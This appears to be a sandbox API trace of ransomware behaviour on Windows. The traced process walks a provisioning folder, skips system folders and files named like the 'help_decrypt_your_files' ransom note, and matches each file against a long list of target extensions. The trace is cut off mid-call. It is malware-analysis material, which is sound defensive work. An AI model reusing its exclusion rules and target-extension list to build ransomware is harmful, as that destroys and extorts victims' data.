	[0171.660] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime"
	[0171.661] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\"
	[0171.661] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\"
	[0171.661] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*"
	[0171.661] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb8f30
	[0171.661] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*") returned 97
	[0171.662] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.662] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*") returned 0x61
	[0171.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.662] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0171.662] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0171.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0171.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0171.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0171.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0171.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0171.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0171.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0171.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0171.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.679] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.679] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0171.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.679] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0171.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0171.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0171.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0171.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.681] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0171.681] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0171.682] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e3a2a4, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e3a2a4, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e60513, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0171.682] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0171.682] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0171.682] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\"
	[0171.682] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml"
	[0171.682] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0171.682] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.683] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0171.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.683] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.683] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"
	[0171.683] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml") returned 109
	[0171.683] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.684] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0171.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.684] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0171.685] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0171.685] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0171.685] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0171.685] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\"
	[0171.685] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml"
	[0171.685] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0171.685] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.686] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0171.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.686] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.686] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"
	[0171.686] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml") returned 109
	[0171.686] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.687] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0171.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.687] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.p